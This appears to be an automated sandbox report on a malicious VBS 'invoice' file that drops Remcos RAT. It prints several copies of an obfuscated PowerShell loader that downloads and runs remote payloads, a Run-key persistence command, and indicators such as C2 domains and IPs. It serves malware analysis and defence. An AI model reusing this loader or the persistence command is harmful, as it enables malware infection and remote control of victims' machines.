cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes byggeforetagender jenda nonmetallurgically skalatrinnets siddembler sokkefdders doedsstraale filnavnene tetricalness traadhegnenes ironworks76 retterstedets juridicial intetkoen tankesystemets48 sideprintets opbevaringens hydronically forbundsstatens pokeransigtets putzed pardonnerende rangsforskel samariterkursernes';if (${host}.currentculture) {$bofllen++;}function toddyernes($experientialistic){$larisas=$experientialistic.length-$bofllen;$stregninger='substri';$stregninger+='ng';for( $trepanationen=1;$trepanationen -lt $larisas;$trepanationen+=2){$byggeforetagender+=$experientialistic.$stregninger.invoke( $trepanationen, $bofllen);}$byggeforetagender;}function unopportunely($unexchangeableness){ & ($catguts) ($unexchangeableness);}$doktorafhandlinger=toddyernes 'hmto z imlvl,am/ 5 .i0c ,( whi n dso w sp ,nwts v1p0 . 0k;. ,w ihn,6s4p;. bx 6 4.; crdvw:,1f2t1r.k0g) ggse cmkpob/,2b0p1.0 0b1u0 1l f irrbe,fsohxs/m1a2d1a.,0s ';$grampa=toddyernes ' upsce ra- augse,nst, ';$siddembler=toddyernes 'ahst tdp.s : /p/ cso n,tfeem e.g ap.vc o,m .dd oe/no.umthgka,s s e,d ..etmtz >,h t,tfpr: /,/ 1 0 3 .r1b9p5,.i2.3m7 .p4,3d/,ouuntsgda.sss,esd . esm z. ';$hamskiftets=toddyernes ' >. ';$catguts=toddyernes ' ide x, ';$arbejdsgangene='filnavnene';$characterisation = toddyernes 'aebc.hion %.asp prd,autuab% \pstcaagb.r o s.ehl,yd. tho.rz a& & .evcch,oh bto ';unopportunely (toddyernes '.$cg laoeb a.l.:offl a gsktn,a prp.e rps,= (.c,m d h/scs i$,c h a,rmascktbeir,igs,a t ifoun,)u ');unopportunely (toddyernes 'b$sg l.oabsaal :as.k a lba tbr ipnpn,e.ttst=s$nscird dse mabplhe r.. ssp,lciytg(u$ h.a mtsak idf t ebtisk)s ');unopportunely (toddyernes 's[nn ect.. s.e,r v,iuc e p o.i,n tbmdacn a gke rl].:s:ssue caurrtint yspsrsortkofc o l ,=, u[cnue t.. sse csuprtipt.y.pur.ortpouc,o l tsyap ea]b:g: tblss 1i2. ');$siddembler=$skalatrinnets[0];$trepanationenllaudatory= (toddyernes 'c$,g lao b a l : sloplndbe r ife trss= n.eowc- onbuj ebc t smyas tsepmf.bnveatk. w epbycml i edn t');$trepanationenllaudatory+=$flagknappers[1];unopportunely ($trepanationenllaudatory);unopportunely (toddyernes ',$,s oulpdaeprtike t,s..rh e a dcesrtsa[b$.g.raa msp a,]f=s$,d.o k tpo rha,f hga nsd l i n.gzeer ');$narcotisation205=toddyernes ' $ssfo ludbe.ruiseot,s ..d o,w.nmlcokadd fpiflke.( $lspipdnd erm,b loefr,,,$.pca r,doonngn e.rse nvd eo)s ';$pardonnerende=$flagknappers[0];unopportunely (toddyernes 's$mgil o bsa lg:af otrah.j uilcs.=i(ht ejswt - pla tdhu $spbaur dho,nbnpesr e.n,d.ev) ');while (!$forhjuls) {unopportunely (toddyernes '.$mg,ljofb,	Jump to behavior

Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerg
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/02 01:48:02 Program Manager]
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managern
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:1
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerknown.
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager6be679r
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\
Source: wab.exe, 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managery
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/02 01:48:09 Program Manager]

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.195.237.43	unknown	Viet Nam	38733	CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN	false
206.123.148.198	janbours92harbu02.duckdns.org	United States	9009	M247GB	true
192.185.112.252	contemega.com.do	United States	46606	UNIFIEDLAYER-AS-1US	false

Contacted Domains

Name	IP	Active
janbours92harbu02.duckdns.org	206.123.148.198	true
contemega.com.do	192.185.112.252	true
janbours92harbu03.duckdns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
janbours92harbu02.duckdns.org	true	11%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://103.195.237.43/QJqDH201.bin	false	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contemega.com.do/Outgassed.emz	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: janbours92harbu02.duckdns.org

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000A.00000002.2961771384.0000000005FB4000.00000004.00000020.00020000.00000000.sdmp

Multi AV Scanner detection for domain / URL

Source: janbours92harbu02.duckdns.org	Virustotal: Detection: 10%	Perma Link
Source: janbours92harbu03.duckdns.org	Virustotal: Detection: 7%	Perma Link
Source: janbours92harbu02.duckdns.org	Virustotal: Detection: 10%	Perma Link
Source: http://103.195.237.43/Outgassed.emz	Virustotal: Detection: 13%	Perma Link
Source: https://contemega.com.do/Outgassed.emz	Virustotal: Detection: 6%	Perma Link
Source: http://103.195.237.43	Virustotal: Detection: 11%	Perma Link
Source: http://103.195.237.43/QJqDH201.bin	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for submitted file

Source: Maersk_BL_Invoice_Packinglist.vbs	Virustotal: Detection: 12%			Perma Link
Source: Maersk_BL_Invoice_Packinglist.vbs	ReversingLabs: Detection: 13%

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown

HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Snort IDS alert for network traffic

